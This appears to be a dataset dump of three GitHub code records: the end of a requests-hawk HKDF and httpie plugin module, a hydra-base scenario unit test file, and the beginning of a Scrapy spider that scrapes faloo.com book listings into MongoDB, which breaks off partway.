int(math.ceil(L * 1.0 / digest_size))\n assert N <= 255\n T = b\"\"\n output = []\n for i in xrange(1, N + 1):\n data = T + info + chr(i).encode(\"utf-8\")\n T = hmac.new(PRK, data, hashmod).digest()\n output.append(T)\n return b\"\".join(output)[:L]\n\n\ndef HKDF(secret, salt, info, size, hashmod=hashlib.sha256):\n \"\"\"HKDF-extract-and-expand as a single function.\"\"\"\n PRK = HKDF_extract(salt, secret, hashmod)\n return HKDF_expand(PRK, info, size, hashmod)\n\n\n# If httpie is installed, register the hawk plugin.\ntry:\n\n from httpie.plugins import AuthPlugin\n\n class HawkPlugin(AuthPlugin):\n\n name = 'Hawk Auth'\n auth_type = 'hawk'\n description = ''\n\n def get_auth(self, id, key):\n kwargs = {}\n if key == '':\n kwargs['hawk_session'] = id\n else:\n kwargs['credentials'] = {\n 'id': id,\n 'key': key,\n 'algorithm': 'sha256'\n }\n return HawkAuth(**kwargs)\n\nexcept ImportError:\n pass\n","repo_name":"magopian/requests-hawk","sub_path":"requests_hawk/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"21010103045","text":"import server\nimport datetime\nimport copy\nimport logging\nimport json\nimport hydra_base\nfrom hydra_base import HydraError, JSONObject, Dataset\nfrom hydra_base.util.hydra_dateutil import ordinal_to_timestamp, timestamp_to_ordinal\nlog = logging.getLogger(__name__)\n\nclass ScenarioTest(server.SoapServerTest):\n \n def get_scenario(self, scenario_id):\n \"\"\"\n Utility function wrapper for a function that's called regularly\n Introduced as the JSONObject wrapper can be controlled more easily\n \"\"\"\n return JSONObject(hydra_base.get_scenario(scenario_id, user_id=self.user_id))\n\n def clone_scenario(self, scenario_id):\n \"\"\"\n Utility function wrapper for a function tat's called regularly.\n Introduced as the JSONObject wrapper can be controlled more easily\n \"\"\"\n return JSONObject(hydra_base.clone_scenario(scenario_id, user_id=self.user_id))\n\n def test_update(self):\n\n network = self.create_network_with_data()\n \n scenario = network.scenarios[0]\n scenario_id = scenario.id\n\n resource_scenario = scenario.resourcescenarios[0]\n resource_attr_id = resource_scenario.resource_attr_id\n\n dataset = Dataset(dict(\n type = 'descriptor',\n name = 'Max Capacity',\n unit = 'metres / second',\n dimension = 'number of units per time unit',\n value = 'I am an updated test!',\n ))\n\n new_resource_scenario = hydra_base.add_data_to_attribute(scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n assert new_resource_scenario.value.value == 'I am an updated test!', \"Value was not updated correctly!!\"\n\n def test_add_scenario(self):\n \"\"\"\n Test adding a new scenario to a network.\n \"\"\"\n network = self.create_network_with_data()\n\n new_scenario = copy.deepcopy(network.scenarios[0])\n new_scenario.id = -1\n new_scenario.name = 'Scenario 2'\n new_scenario.description = 'Scenario 2 Description'\n new_scenario.start_time = datetime.datetime.now()\n new_scenario.end_time = new_scenario.start_time + datetime.timedelta(hours=10)\n new_scenario.time_step = \"1 day\"\n\n node_attrs = network.nodes[0].attributes\n\n #This is an example of 3 diffent kinds of data\n #A simple string (Descriptor)\n #A time series, where the value may be a 1-D array\n #A multi-dimensional array.\n descriptor = self.create_descriptor(node_attrs[0], \"new_descriptor\")\n timeseries = self.create_timeseries(node_attrs[1])\n\n for r in new_scenario.resourcescenarios:\n if r.resource_attr_id == node_attrs[0].id:\n r.value = descriptor['value']\n elif r.resource_attr_id == node_attrs[1].id:\n r.value = timeseries['value']\n\n scenario = JSONObject(hydra_base.add_scenario(network.id, new_scenario, user_id=self.user_id))\n\n assert scenario is not None\n assert len(scenario.resourcegroupitems) > 0\n assert len(scenario.resourcescenarios) > 0\n\n\n def test_update_scenario(self):\n \"\"\"\n Test updating an existing scenario.\n \"\"\"\n network = self.create_network_with_data()\n\n #Create the new scenario\n scenario = network.scenarios[0] \n scenario.name = 'Updated Scenario'\n scenario.description = 'Updated Scenario Description'\n scenario.start_time = datetime.datetime.now()\n scenario.end_time = scenario.start_time + datetime.timedelta(hours=10)\n scenario.time_step = \"1 day\"\n \n #Identify 2 nodes to play around with -- the first and last in the list.\n node1 = network.nodes[0]\n node2 = network.nodes[-1]\n\n #Identify 1 resource group item to edit (the last one in the list).\n item_to_edit = scenario.resourcegroupitems[-1]\n #Just checking that we're not changing an item that is already\n #assigned to this node..\n assert scenario.resourcegroupitems[-1].node_id != node2.node_id\n scenario.resourcegroupitems[-1].node_id = node2.node_id\n\n descriptor = self.create_descriptor(node1.attributes[0], \n \"updated_descriptor\")\n\n for resourcescenario in scenario.resourcescenarios:\n if resourcescenario.attr_id == descriptor['attr_id']:\n resourcescenario.value = descriptor['value']\n \n updated_scenario = JSONObject(hydra_base.update_scenario(scenario, user_id=self.user_id))\n\n assert updated_scenario is not None\n assert updated_scenario.id == scenario.id\n assert updated_scenario.name == scenario.name \n assert updated_scenario.description == scenario.description\n assert \"%.2f\"%updated_scenario.start_time == \"%.2f\"%timestamp_to_ordinal(scenario.start_time)\n assert \"%.2f\"%updated_scenario.end_time == \"%.2f\"%timestamp_to_ordinal(scenario.end_time)\n assert updated_scenario.time_step == scenario.time_step\n assert len(updated_scenario.resourcegroupitems) > 0\n for i in updated_scenario.resourcegroupitems:\n if i.item_id == item_to_edit.id:\n assert i.node_id == node2.node_id\n assert len(updated_scenario.resourcescenarios) > 0\n\n for data in updated_scenario.resourcescenarios: \n if data.attr_id == descriptor['attr_id']:\n assert data.value.value == descriptor['value']['value']\n\n def test_get_dataset_scenarios(self):\n \"\"\"\n Test to get the scenarios attached to a dataset\n \"\"\"\n\n network = self.create_network_with_data()\n\n #Create the new scenario\n scenario = network.scenarios[0] \n rs = scenario.resourcescenarios\n \n dataset_id_to_check = rs[0].value.id\n\n dataset_scenarios = [JSONObject(s) for s in hydra_base.get_dataset_scenarios(dataset_id_to_check, user_id=self.user_id)]\n\n assert len(dataset_scenarios) == 1\n\n assert dataset_scenarios[0].id == scenario.id\n \n clone = self.clone_scenario(scenario.id)\n new_scenario = self.get_scenario(clone.id)\n\n dataset_scenarios = [JSONObject(s) for s in hydra_base.get_dataset_scenarios(dataset_id_to_check, user_id=self.user_id)]\n\n assert len(dataset_scenarios) == 2\n\n assert dataset_scenarios[0].id == scenario.id\n assert dataset_scenarios[1].id == new_scenario.id\n\n def test_update_resourcedata(self):\n \"\"\"\n Test updating an existing scenario data.\n 2 main points to test: 1: setting a value to null should remove\n the resource scenario\n 2: changing the value should create a new dataset\n \"\"\"\n network = self.create_network_with_data()\n\n #Create the new scenario\n scenario = network.scenarios[0] \n num_old_rs = len(scenario.resourcescenarios)\n \n #Identify 2 nodes to play around with -- the first and last in the list.\n node1 = network.nodes[0]\n node2 = network.nodes[-1]\n\n descriptor = self.create_descriptor(node1.attributes[0], \n \"updated_descriptor\")\n\n val_to_delete = node2.attributes[0]\n \n rs_to_update = []\n updated_dataset_id = None\n for resourcescenario in scenario.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == descriptor['resource_attr_id']:\n updated_dataset_id = resourcescenario.value['id']\n resourcescenario.value = descriptor['value']\n rs_to_update.append(resourcescenario)\n elif ra_id == val_to_delete['id']:\n resourcescenario.value = None\n rs_to_update.append(resourcescenario)\n \n assert updated_dataset_id is not None\n\n new_resourcescenarios = [JSONObject(rs) for rs in hydra_base.update_resourcedata(scenario.id, rs_to_update, user_id=self.user_id)]\n\n assert len(new_resourcescenarios) == 1\n\n for rs in new_resourcescenarios: \n if rs.resource_attr_id == descriptor['resource_attr_id']:\n assert rs.value.value == descriptor['value']['value']\n\n updated_scenario = self.get_scenario(scenario.id)\n\n num_new_rs = len(updated_scenario.resourcescenarios)\n assert num_new_rs == num_old_rs - 1\n\n\n for u_rs in updated_scenario.resourcescenarios:\n for rs in new_resourcescenarios:\n if u_rs.resource_attr_id == rs.resource_attr_id:\n assert str(u_rs.value) == str(rs.value)\n break\n\n def test_update_resourcedata_single_dataset_update_and_delete(self):\n \"\"\"\n Test to ensure update_resourcedata does not update other\n datasets that it should not.\n \"\"\"\n network = self.create_network_with_data()\n\n scenario_1 = network.scenarios[0]\n scenario_2 = self.clone_scenario(scenario_1.id)\n scenario_2 = self.get_scenario(scenario_2.id)\n\n new_value = json.dumps({\"index\": {\"1.0\":\"test\", \"2.0\":\"update\"}})\n\n #Delete a timeseries from one scenario, so there's only 1 reference to that\n #dataset in tResourceSceanrio.\n ts_to_delete = []\n ra_id = None\n ts_id = None\n for rs in scenario_1.resourcescenarios:\n if rs.value.type == 'timeseries':\n ra_id = rs.resource_attr_id\n ts_id = rs.value.id\n rs.value = None\n ts_to_delete.append(rs)\n break\n\n ts_to_update = []\n for rs in scenario_2.resourcescenarios:\n if rs.resource_attr_id == ra_id:\n rs.value.value= new_value\n ts_to_update.append(rs)\n break\n\n deleted_rs = JSONObject(hydra_base.update_resourcedata(scenario_1.id,\n ts_to_delete, user_id=self.user_id))\n updated_ts_rs = JSONObject(hydra_base.update_resourcedata(scenario_2.id,\n ts_to_update, user_id=self.user_id))\n scenario_2_updated_1 = self.get_scenario(scenario_2.id)\n for rs in scenario_2_updated_1.resourcescenarios:\n if rs.resource_attr_id == ra_id:\n assert json.loads(rs.value.value) == json.loads(new_value)\n #Either the dataset is the same dataset, just updated or the dataset\n #has been removed and linked to a previous dataset, which must have a lower ID.\n assert rs.value.id <= ts_id\n break\n else:\n raise Exception(\"Couldn't find resource scenario. SOmething went wrong.\")\n\n def test_update_resourcedata_consistency(self):\n \"\"\"\n Test to ensure update_resourcedata does not update other\n datasets that it should not.\n \"\"\"\n network = self.create_network_with_data()\n \n scenario_1 = network.scenarios[0] \n scenario_2 = self.clone_scenario(scenario_1.id)\n scenario_2 = self.get_scenario(scenario_2.id)\n\n #Identify 2 nodes to play around with -- the first and last in the list.\n node1 = network.nodes[0]\n\n descriptor = self.create_descriptor(node1.attributes[0], \n \"updated_descriptor\")\n\n rs_to_update = self._get_rs_to_update(scenario_1, descriptor)\n\n #Update the value\n new_resourcescenarios = [JSONObject(rs) for rs in hydra_base.update_resourcedata(scenario_1.id,\n rs_to_update, user_id=self.user_id)]\n\n rs_1_id = None\n updated_scenario_1 = self.get_scenario(scenario_1.id)\n for u_rs in updated_scenario_1.resourcescenarios:\n for rs in new_resourcescenarios:\n if u_rs.resource_attr_id == rs.resource_attr_id:\n assert str(u_rs.value) == str(rs.value)\n rs_1_id = u_rs.value\n break\n\n scalar = self.create_descriptor(node1.attributes[0], 200)\n\n rs_to_update = self._get_rs_to_update(scenario_2, scalar)\n \n new_resourcescenarios = hydra_base.update_resourcedata(scenario_2.id,\n rs_to_update, user_id=self.user_id)\n rs_2_id = None\n #Check that scenario 2 has been updated correctly.\n updated_scenario_2 = self.get_scenario(scenario_2.id)\n for u_rs in updated_scenario_2.resourcescenarios:\n for rs in new_resourcescenarios:\n if u_rs.resource_attr_id == rs.resource_attr_id:\n rs_2_id = u_rs.value\n assert str(u_rs.value) == str(rs.value)\n break\n log.critical(\"%s vs %s\", rs_1_id, rs_2_id)\n #Check that this change has not affected scenario 1\n for u_rs in updated_scenario_1.resourcescenarios:\n for rs in new_resourcescenarios:\n if u_rs.resource_attr_id == rs.resource_attr_id:\n assert str(u_rs.value) != str(rs.value)\n break\n\n def _get_rs_to_update(self, scenario, rs):\n \"\"\"\n Given a scenario, fetch all the RS which match the attribute ID\n of the rs passed in. These will be updated in an update call.\n \"\"\"\n rs_to_update = []\n updated_dataset_id = None\n for resourcescenario in scenario.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == rs['resource_attr_id']:\n updated_dataset_id = resourcescenario.value['id']\n resourcescenario.value = rs['value']\n rs_to_update.append(resourcescenario)\n\n assert updated_dataset_id is not None\n\n return rs_to_update\n\n def test_get_attributes_for_resource(self):\n \"\"\"\n Test to check leng's questions about this not working correctly.\n \"\"\"\n network = self.create_network_with_data()\n\n #Create the new scenario\n scenario = network.scenarios[0] \n node1 = network.nodes[0]\n\n ra_to_update = node1.attributes[0].id\n \n updated_val = None\n\n rs_to_update = []\n for resourcescenario in scenario.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == ra_to_update:\n updated_val = resourcescenario.value.value\n resourcescenario.value.name = 'I am an updated dataset name'\n rs_to_update.append(resourcescenario)\n \n hydra_base.get_attributes_for_resource(network.id, scenario.id, 'NODE', [node1.id], user_id=self.user_id)\n\n hydra_base.update_resourcedata(scenario.id, rs_to_update)\n\n new_node_data = [JSONObject(d) for d in hydra_base.get_attributes_for_resource(network.id, scenario.id, [node1.id], user_id=self.user_id)]\n\n for new_val in new_node_data:\n if new_val.resourcescenario.value.value == updated_val:\n assert new_val.resourcescenario.value.name == 'I am an updated dataset name'\n\n def test_bulk_update_resourcedata(self):\n \"\"\"\n Test updating scenario data in a number of scenarios at once.\n 2 main points to test: 1: setting a value to null should remove\n the resource scenario\n 2: changing the value should create a new dataset\n \"\"\"\n network1 = self.create_network_with_data()\n scenario1_to_update = network1.scenarios[0] \n clone = self.clone_scenario(network1.scenarios[0].id)\n scenario2_to_update = self.get_scenario(clone.id)\n\n #Identify 2 nodes to play around with -- the first and last in the list.\n node1 = network1.nodes[0]\n node2 = network1.nodes[-1]\n\n descriptor = self.create_descriptor(node1.attributes[0], \n \"updated_descriptor\")\n\n val_to_delete = node2.attributes[0]\n \n rs_to_update = []\n updated_dataset_id = None\n for resourcescenario in scenario1_to_update.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == descriptor['resource_attr_id']:\n updated_dataset_id = resourcescenario.value['id']\n resourcescenario.value = descriptor['value']\n rs_to_update.append(resourcescenario)\n elif ra_id == val_to_delete['id']:\n resourcescenario.value = None\n rs_to_update.append(resourcescenario)\n \n assert updated_dataset_id is not None\n \n scenario_ids = []\n scenario_ids.append(scenario1_to_update.id)\n scenario_ids.append(scenario2_to_update.id)\n\n result = hydra_base.bulk_update_resourcedata(scenario_ids, rs_to_update, user_id=self.user_id)\n\n assert result == \"OK\" \n\n updated_scenario1_data = self.get_scenario(scenario1_to_update.id)\n updated_scenario2_data = self.get_scenario(scenario2_to_update.id)\n \n for rs in updated_scenario1_data.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == descriptor['resource_attr_id']:\n assert rs.value == descriptor['value']\n for rs in updated_scenario2_data.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == descriptor['resource_attr_id']:\n assert rs.value == descriptor['value']\n\n\n\n def test_bulk_add_data(self):\n\n data = []\n\n dataset1 = Dataset()\n \n dataset1.type = 'timeseries'\n dataset1.name = 'my time series'\n dataset1.unit = 'feet cubed'\n dataset1.dimension = 'cubic capacity'\n\n t1 = datetime.datetime.now()\n t2 = t1+datetime.timedelta(hours=1)\n t3 = t1+datetime.timedelta(hours=2)\n\n t1 = t1.strftime(self.fmt)\n t2 = t2.strftime(self.fmt)\n t3 = t3.strftime(self.fmt)\n \n val_1 = 1.234\n val_2 = 2.345\n val_3 = 3.456\n\n ts_val = json.dumps({0: {t1: val_1,\n t2: val_2,\n t3: val_3}})\n dataset1.value = ts_val \n data.Dataset.append(dataset1)\n\n dataset2 = Dataset()\n dataset2.type = 'descriptor'\n dataset2.name = 'Max Capacity'\n dataset2.unit = 'metres / second'\n dataset2.dimension = 'number of units per time unit'\n \n dataset2.value ='I am an updated test!' \n\n data.Dataset.append(dataset2)\n\n new_datasets = [Dataset(d) for d in hydra_base.bulk_insert_data(data, user_id=self.user_id)]\n\n assert len(new_datasets.integer) == 2, \"Data was not added correctly!\"\n\n\n def test_clone(self):\n\n network = self.create_network_with_data()\n \n assert len(network.scenarios) == 1, \"The network should have only one scenario!\"\n\n #self.create_constraint(network)\n \n network = JSONObject(hydra_base.get_network(network.id, user_id=self.user_id))\n\n scenario = network.scenarios[0]\n scenario_id = scenario.id\n\n clone = self.clone_scenario(scenario_id)\n new_scenario = self.get_scenario(clone.id)\n\n\n updated_network = JSONObject(hydra_base.get_network(new_scenario.network_id, user_id=self.user_id))\n\n\n assert len(updated_network.scenarios) == 2, \"The network should have two scenarios!\"\n\n assert updated_network.scenarios[1].resourcescenarios is not None, \"Data was not cloned!\"\n\n scen_2_val = updated_network.scenarios[1].resourcescenarios[0].value.id\n scen_1_val = network.scenarios[0].resourcescenarios[0].value.id\n \n assert scen_2_val == scen_1_val, \"Data was not cloned correctly\"\n\n\n # scen_1_constraint = network.scenarios[0].constraints.Constraint[0].value\n #scen_2_constraint = updated_network.scenarios[1].constraints.Constraint[0].value\n#\n # assert scen_1_constraint == scen_2_constraint, \"Constraints did not clone correctly!\"\n \n scen_1_resourcegroupitems = network.scenarios[0].resourcegroupitems\n scen_2_resourcegroupitems = updated_network.scenarios[1].resourcegroupitems\n \n assert len(scen_1_resourcegroupitems) == len(scen_2_resourcegroupitems)\n\n return updated_network\n\n def test_compare(self):\n\n network = self.create_network_with_data()\n \n\n assert len(network.scenarios) == 1, \"The network should have only one scenario!\"\n\n # self.create_constraint(network)\n \n network = JSONObject(hydra_base.get_network(network.id, user_id=self.user_id))\n\n scenario = network.scenarios[0]\n scenario_id = scenario.id\n\n clone = self.clone_scenario(scenario_id)\n new_scenario = self.get_scenario(clone.id)\n\n # self.create_constraint(network, constant=4)\n\n resource_scenario = new_scenario.resourcescenarios[0]\n resource_attr_id = resource_scenario.resource_attr_id\n\n dataset = Dataset()\n \n dataset = Dataset()\n dataset.type = 'descriptor'\n dataset.name = 'Max Capacity'\n dataset.unit = 'metres / second'\n dataset.dimension = 'number of units per time unit'\n \n dataset.value ='I am an updated test!' \n\n hydra_base.add_data_to_attribute(scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n item_to_remove = new_scenario.resourcegroupitems[0].id\n hydra_base.delete_resourcegroupitem(item_to_remove, user_id=self.user_id)\n\n updated_network = JSONObject(hydra_base.get_network(new_scenario.network_id, user_id=self.user_id))\n\n scenarios = updated_network.scenarios\n \n scenario_1 = None\n scenario_2 = None\n for s in scenarios:\n if s.id == new_scenario.id:\n scenario_1 = s \n else:\n scenario_2 = s\n\n scenario_diff = hydra_base.compare_scenarios(scenario_1.id, scenario_2.id, user_id=self.user_id)\n \n #print \"Comparison result: %s\"%(scenario_diff)\n\n assert len(scenario_diff.resourcescenariosDiff) == 1, \"Data comparison was not successful!\"\n\n # assert len(scenario_diff.constraints.common_constraints) == 1, \"Constraint comparison was not successful!\"\n \n # assert len(scenario_diff.constraints.scenario_2_constraints) == 1, \"Constraint comparison was not successful!\"\n\n assert len(scenario_diff.groups.scenario_2_items) == 1, \"Group comparison was not successful!\"\n assert scenario_diff.groups.scenario_1_items is None, \"Group comparison was not successful!\"\n\n return updated_network\n\n def test_purge_scenario(self):\n net = self.test_clone()\n\n scenarios_before = net.scenarios\n\n assert len(scenarios_before) == 2\n\n hydra_base.purge_scenario(scenarios_before[1].id, user_id=self.user_id)\n\n updated_net = JSONObject(hydra_base.get_network(net.id, user_id=self.user_id))\n\n scenarios_after = updated_net.scenarios\n\n assert len(scenarios_after) == 1\n\n self.assertRaises(HydraError, self.get_scenario, scenarios_before[1].id)\n\n assert str(scenarios_after[0]) == str(scenarios_before[0])\n\n def test_delete_scenario(self):\n net = self.test_clone()\n\n scenarios_before = net.scenarios\n\n assert len(scenarios_before) == 2\n\n hydra_base.delete_scenario(scenarios_before[1].id, user_id=self.user_id)\n\n updated_net = JSONObject(hydra_base.get_network(net.id, user_id=self.user_id))\n\n scenarios_after_delete = updated_net.scenarios\n\n assert len(scenarios_after_delete) == 1\n\n hydra_base.activate_scenario(scenarios_before[1].id, user_id=self.user_id)\n\n updated_net2 = JSONObject(hydra_base.get_network(net.id, user_id=self.user_id))\n\n scenarios_after_reactivate = updated_net2.scenarios\n\n assert len(scenarios_after_reactivate) == 2\n \n hydra_base.delete_scenario(scenarios_before[1].id, user_id=self.user_id)\n hydra_base.clean_up_network(net.id, user_id=self.user_id)\n updated_net3 = JSONObject(hydra_base.get_network(net.id, user_id=self.user_id))\n scenarios_after_cleanup = updated_net3.scenarios\n assert len(scenarios_after_cleanup) == 1\n self.assertRaises(HydraError, self.get_scenario, scenarios_before[1].id)\n \n def test_lock_scenario(self):\n\n network = self.create_network_with_data()\n \n network = hydra_base.get_network(network.id, user_id=self.user_id)\n\n scenario_to_lock = network.scenarios[0]\n scenario_id = scenario_to_lock.id\n \n log.info('Cloning scenario %s'%scenario_id)\n clone = self.clone_scenario(scenario_id)\n unlocked_scenario = self.get_scenario(clone.id)\n \n log.info(\"Locking scenario\")\n hydra_base.lock_scenario(scenario_id, user_id=self.user_id)\n\n locked_scenario = self.get_scenario(scenario_id)\n\n assert locked_scenario.locked == 'Y'\n\n dataset = Dataset()\n \n dataset.type = 'descriptor'\n dataset.name = 'Max Capacity'\n dataset.unit = 'metres / second'\n dataset.dimension = 'number of units per time unit'\n \n dataset.value = 'I am an updated test!' \n\n \n locked_resource_scenarios = []\n for rs in locked_scenario.resourcescenarios:\n if rs.value.type == 'descriptor':\n locked_resource_scenarios.append(rs)\n\n unlocked_resource_scenarios = []\n for rs in unlocked_scenario.resourcescenarios:\n if rs.value.type == 'descriptor':\n unlocked_resource_scenarios.append(rs)\n\n resource_attr_id = unlocked_resource_scenarios[0].resource_attr_id\n \n locked_resource_scenarios_value = None\n for rs in locked_scenario.resourcescenarios:\n if rs.resource_attr_id == resource_attr_id:\n locked_resource_scenarios_value = rs.value\n\n unlocked_resource_scenarios_value = None\n for rs in unlocked_scenario.resourcescenarios:\n if rs.resource_attr_id == resource_attr_id:\n unlocked_resource_scenarios_value = rs.value\n log.info(\"Updating a shared dataset\")\n ds = unlocked_resource_scenarios_value\n ds.dimension = 'updated_dimension'\n updated_ds = JSONObject(hydra_base.update_dataset(ds, user_id=self.user_id))\n\n updated_unlocked_scenario = self.get_scenario(unlocked_scenario.id)\n #This should not have changed\n updated_locked_scenario = self.get_scenario(locked_scenario.id)\n\n locked_resource_scenarios_value = None\n for rs in updated_locked_scenario.resourcescenarios:\n if rs.resource_attr_id == resource_attr_id:\n locked_resource_scenarios_value = rs.value\n\n unlocked_resource_scenarios_value = None\n for rs in updated_unlocked_scenario.resourcescenarios:\n if rs.resource_attr_id == resource_attr_id:\n unlocked_resource_scenarios_value = rs.value\n\n self.assertRaises(HydraError, hydra_base.add_data_to_attribute, scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n \n #THe most complicated situation is this:\n #Change a dataset in an unlocked scenario, which is shared by a locked scenario.\n #The original dataset should stay connected to the locked scenario and a new\n #dataset should be created for the edited scenario.\n hydra_base.add_data_to_attribute(unlocked_scenario.id, resource_attr_id, dataset, user_id=self.user_id)\n\n updated_unlocked_scenario = self.get_scenario(unlocked_scenario.id)\n #This should not have changed\n updated_locked_scenario = self.get_scenario(locked_scenario.id)\n\n locked_resource_scenarios_value = None\n for rs in updated_locked_scenario.resourcescenarios:\n if rs.resource_attr_id == resource_attr_id:\n locked_resource_scenarios_value = rs.value\n\n unlocked_resource_scenarios_value = None\n for rs in updated_unlocked_scenario.resourcescenarios:\n if rs.resource_attr_id == resource_attr_id:\n unlocked_resource_scenarios_value = rs.value\n\n\n assert locked_resource_scenarios_value.value != unlocked_resource_scenarios_value.value\n\n item_to_remove = locked_scenario.resourcegroupitems[0].id\n self.assertRaises(HydraError, hydra_base.delete_resourcegroupitem, item_to_remove, user_id=self.user_id)\n log.info(\"Locking scenario\")\n hydra_base.unlock_scenario(scenario_id, user_id=self.user_id)\n\n locked_scenario = self.get_scenario(scenario_id)\n\n assert locked_scenario.locked == 'N'\n\n\n def test_get_attribute_data(self):\n \"\"\"\n Test for retrieval of data for an attribute in a scenario.\n \"\"\"\n\n new_net = self.create_network_with_data()\n\n s = new_net.scenarios[0]\n\n nodes = new_net.nodes\n\n resource_attr = nodes[0].attributes[0]\n\n attr_id = resource_attr.attr_id\n\n all_matching_ras = []\n for n in nodes:\n for ra in n.attributes:\n if ra.attr_id == attr_id:\n all_matching_ras.append(ra)\n continue\n\n retrieved_ras = hydra_base.get_attribute_datasets(attr_id, s.id, user_id=self.user_id)\n\n ra_dict = {}\n for ra in retrieved_ras:\n ra_dict[ra.id] = ra\n \n assert len(retrieved_ras) == len(all_matching_ras)\n\n for rs in s.resourcescenarios:\n if ra_dict.get(rs.resource_attr_id):\n matching_rs = ra_dict[rs.resource_attr_id].resourcescenario\n assert str(rs) == str(matching_rs)\n \n def test_copy_data_from_scenario(self):\n\n \"\"\"\n Test copy_data_from_scenario : test that one scenario\n can be updated to contain the data of another with the same\n resource attrs.\n \"\"\"\n\n network = self.create_network_with_data()\n \n\n network = hydra_base.get_network(network.id, user_id=self.user_id)\n\n scenario = network.scenarios[0]\n source_scenario_id = scenario.id\n\n clone = self.clone_scenario(source_scenario_id)\n cloned_scenario = self.get_scenario(clone.id)\n\n resource_scenario = cloned_scenario.resourcescenarios[0]\n resource_attr_id = resource_scenario.resource_attr_id\n\n dataset = Dataset()\n dataset.type = 'descriptor'\n dataset.name = 'Max Capacity'\n dataset.unit = 'metres / second'\n dataset.dimension = 'number of units per time unit'\n \n dataset.value = 'I am an updated test!'\n \n\n hydra_base.add_data_to_attribute(source_scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n scenario_diff = hydra_base.compare_scenarios(source_scenario_id, cloned_scenario.id, user_id=self.user_id)\n \n assert len(scenario_diff.resourcescenariosDiff) == 1, \"Data comparison was not successful!\"\n\n hydra_base.copy_data_from_scenario(resource_attr_id, cloned_scenario.id, source_scenario_id, user_id=self.user_id)\n\n scenario_diff = hydra_base.compare_scenarios(source_scenario_id, cloned_scenario.id, user_id=self.user_id)\n \n assert scenario_diff.resourcescenarios == None, \"Scenario update was not successful!\"\n\n def test_set_resourcescenario_dataset(self):\n\n \"\"\"\n Test the direct setting of a dataset id on a resource scenario \n \"\"\"\n\n network = self.create_network_with_data()\n \n\n network = hydra_base.get_network(network.id, user_id=self.user_id)\n\n scenario = network.scenarios[0]\n source_scenario_id = scenario.id\n\n clone = self.clone_scenario(source_scenario_id)\n cloned_scenario = self.get_scenario(clone.id)\n\n resource_scenario = cloned_scenario.resourcescenarios[0]\n resource_attr_id = resource_scenario.resource_attr_id\n\n dataset = Dataset()\n dataset.type = 'descriptor'\n dataset.name = 'Max Capacity'\n dataset.unit = 'metres / second'\n dataset.dimension = 'number of units per time unit'\n\n dataset.value = 'I am an updated test!' \n\n new_ds = hydra_base.add_dataset(dataset, user_id=self.user_id)\n\n hydra_base.set_resourcescenario_dataset(resource_attr_id, source_scenario_id, new_ds.id, user_id=self.user_id)\n\n updated_net = hydra_base.get_network(network.id, user_id=self.user_id)\n\n updated_scenario = updated_net.scenarios[0]\n scenario_rs = updated_scenario.resourcescenarios\n for rs in scenario_rs:\n if rs.resource_attr_id == resource_attr_id:\n assert rs.value.value == 'I am an updated test!'\n\n def test_add_data_to_attribute(self):\n\n network = self.create_network_with_data()\n \n empty_ra = network.links.Link[0].attributes[-1]\n\n scenario = network.scenarios[0]\n scenario_id = scenario.id\n\n resource_scenario = scenario.resourcescenarios[0]\n resource_attr_id = resource_scenario.resource_attr_id\n\n dataset = Dataset()\n dataset.type = 'descriptor'\n dataset.name = 'Max Capacity'\n dataset.unit = 'metres / second'\n dataset.dimension = 'number of units per time unit'\n \n dataset.value = 'I am an updated test!'\n\n updated_resource_scenario = hydra_base.add_data_to_attribute(scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n new_resource_scenario = hydra_base.add_data_to_attribute(scenario_id, empty_ra.id, dataset, user_id=self.user_id)\n\n assert updated_resource_scenario.value.value == 'I am an updated test!', \"Value was not updated correctly!!\"\n assert new_resource_scenario.value.value == 'I am an updated test!', \"Value was not updated correctly!!\"\n\nif __name__ == '__main__':\n server.run()\n","repo_name":"openagua/hydra-base","sub_path":"unittests/test_scenario.py","file_name":"test_scenario.py","file_ext":"py","file_size_in_byte":34131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"27355253628","text":"from ayugespidertools.common.utils import ToolsForAyu\nfrom ayugespidertools.items import AyuItem, DataItem\nfrom ayugespidertools.spiders import AyuSpider\nfrom scrapy.http import Request\nfrom scrapy.http.response.text import TextResponse\n\nfrom DemoSpider.items import TableEnum\n\n\"\"\"\n####################################################################################################\n# collection_website: faloo.com - async 存入 mongoDB 的示例,以 motor 实现\n# collection_content: 飞卢小说网\n# create_time: 2023-05-08\n# explain:\n# demand_code_prefix = \"\"\n####################################################################################################\n\"\"\"\n\n\nclass DemoMongoAsyncSpider(AyuSpider):\n name = \"demo_mongo_async\"\n allowed_domains = [\"faloo.com\"]\n start_urls = [\"http://b.faloo.com/\"]\n\n # 数据库表的枚举信息\n custom_table_enum = TableEnum\n custom_settings = {\n \"ITEM_PIPELINES\": {\n # 激活此项则数据会存储至 MongoDB\n \"ayugespidertools.pipelines.AsyncMongoPipeline\": 300,\n },\n \"DOWNLOADER_MIDDLEWARES\": {\n # 随机请求头\n \"ayugespidertools.middlewares.RandomRequestUaMiddleware\": 400,\n },\n }\n\n def start_requests(self):\n \"\"\"\n get 请求首页,获取项目列表数据\n \"\"\"\n for page in range(1, 11):\n url = f\"https://b.faloo.com/y_0_0_0_0_3_15_{page}.html\"\n yield Request(\n url=url,\n callback=self.parse_first,\n cb_kwargs={\n \"page\": page,\n },\n dont_filter=True,\n )\n\n def parse_first(self, response: TextResponse, page: int):\n self.slog.info(f\"当前采集的站点的第 {page} 页\")\n\n book_info_list = ToolsForAyu.extract_with_xpath(\n response=response,\n query='//div[@class=\"TwoBox02_01\"]/div',\n return_selector=True,\n )\n\n for book_info in book_info_list:\n book_name = ToolsForAyu.extract_with_xpath(\n response=book_info, query=\"div[2]//h1/@title\"\n )\n\n book_href = 